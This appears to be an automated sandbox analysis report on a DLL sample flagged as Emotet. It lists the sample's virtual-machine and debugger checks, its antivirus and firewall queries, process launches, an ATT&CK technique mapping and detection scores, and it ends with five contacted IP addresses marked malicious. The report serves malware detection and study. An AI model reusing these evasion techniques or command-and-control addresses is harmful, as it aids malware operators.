Source: Amcache.hve.22.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.22.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.22.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.22.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: WerFault.exe, 00000019.00000003.597789583.0000000004D37000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: Amcache.hve.22.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.22.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.22.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.22.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.22.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000019.00000003.599090824.0000000004D5D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000002.600542842.0000000004D5F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.22.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.22.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.22.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.22.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.22.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: WerFault.exe, 00000019.00000002.600515890.0000000004D38000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.599177113.0000000004D38000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.679402834.0000018D2F268000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.678647533.00000193C6A29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.22.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECDD1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6ECDD1CC

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECCE4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

0_2_6ECCE4E0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECC1290 GetProcessHeap,HeapAlloc,HeapFree,

0_2_6ECC1290

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECDC050 mov eax, dword ptr fs:[00000030h]	0_2_6ECDC050
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECDBFE0 mov esi, dword ptr fs:[00000030h]	0_2_6ECDBFE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECDBFE0 mov eax, dword ptr fs:[00000030h]	0_2_6ECDBFE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE12CB mov ecx, dword ptr fs:[00000030h]	0_2_6ECE12CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE298C mov eax, dword ptr fs:[00000030h]	0_2_6ECE298C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECDC050 mov eax, dword ptr fs:[00000030h]	4_2_6ECDC050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECDBFE0 mov esi, dword ptr fs:[00000030h]	4_2_6ECDBFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECDBFE0 mov eax, dword ptr fs:[00000030h]	4_2_6ECDBFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECE12CB mov ecx, dword ptr fs:[00000030h]	4_2_6ECE12CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECE298C mov eax, dword ptr fs:[00000030h]	4_2_6ECE298C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01104315 mov eax, dword ptr fs:[00000030h]	5_2_01104315
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01124315 mov eax, dword ptr fs:[00000030h]	8_2_01124315
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD4315 mov eax, dword ptr fs:[00000030h]	13_2_00BD4315

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECDCB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6ECDCB22
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECDD1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6ECDD1CC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6ECE29E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECDCB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6ECDCB22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECDD1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6ECDD1CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECE29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6ECE29E6

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5808 -ip 5808	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 304	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5808 -ip 5808	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 324	Jump to behavior

Source: loaddll32.exe, 00000000.00000000.560057714.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.558542817.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.581833872.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.582621925.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.679386808.00000000031A0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000000.560057714.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.558542817.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.581833872.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.582621925.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.679386808.00000000031A0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.560057714.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.558542817.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.581833872.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.582621925.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.679386808.00000000031A0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.560057714.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.558542817.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.581833872.0000000001120000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.582621925.0000000001120000.00000002.00020000.sdmp, rundll32.exe, 0000001D.00000002.679386808.00000000031A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECDCC44 cpuid

0_2_6ECDCC44

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECDCE15 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6ECDCE15

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.22.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: svchost.exe, 0000000B.00000002.678404306.00000262C083D000.00000004.00000001.sdmp	Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.678609431.00000262C0902000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.678341900.00000262C0829000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.LOG1.22.dr, Amcache.hve.22.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 7.2.rundll32.exe.c620f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.b10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.632468.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a63b78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1110000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1110000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.632468.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a63b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.32a4168.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.c620f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.32a4168.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.bc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3273688.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.bc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3273688.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.540649559.00000000010F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557294263.0000000001110000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.582540666.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.546594533.0000000000A10000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.659478506.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.558410733.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.558256416.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.581726309.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.582467938.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.659377295.000000000061A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.601059851.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.528291798.0000000000C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.601107965.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557479491.000000000328A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.556361000.0000000000C4A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.559892277.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.556237004.0000000000B10000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.581678982.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.559720602.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540803207.000000000325A000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Process Injection12	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery51	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	File Deletion1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TYLNb8VvnmYA.dll	26%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.loaddll32.exe.9e0000.6.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
8.2.rundll32.exe.1110000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.a10000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.632468.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.9e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
7.2.rundll32.exe.b10000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.2.loaddll32.exe.9e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.10f0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.9e0000.3.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.bc0000.1.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.0.loaddll32.exe.9e0000.9.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.microsoft	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	false		high
http://crl.microsoft	WerFault.exe, 00000019.00000002.600418522.0000000003158000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000009.00000002.407719066.000001424C640000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 00000009.00000002.413717159.000001424C66A000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369025048.000001424C668000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000009.00000003.369069267.000001424C642000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369057963.000001424C641000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.409097273.000001424C64C000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369083115.000001424C645000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369057963.000001424C641000.00000004.00000001.sdmp	false		high
http://upx.sf.net	Amcache.hve.22.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000002.00000002.679231655.0000018D2F245000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000009.00000003.369069267.000001424C642000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369057963.000001424C641000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.409097273.000001424C64C000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369083115.000001424C645000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369075670.000001424C63D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000009.00000003.369044474.000001424C65D000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000009.00000002.412108697.000001424C660000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369041405.000001424C65F000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 00000009.00000003.369083115.000001424C645000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369075670.000001424C63D000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000002.00000002.679231655.0000018D2F245000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 00000009.00000002.398712161.000001424C613000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000002.00000002.679231655.0000018D2F245000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000009.00000003.369044474.000001424C65D000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
104.245.52.73	unknown	United States	63251	METRO-WIRELESSUS	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
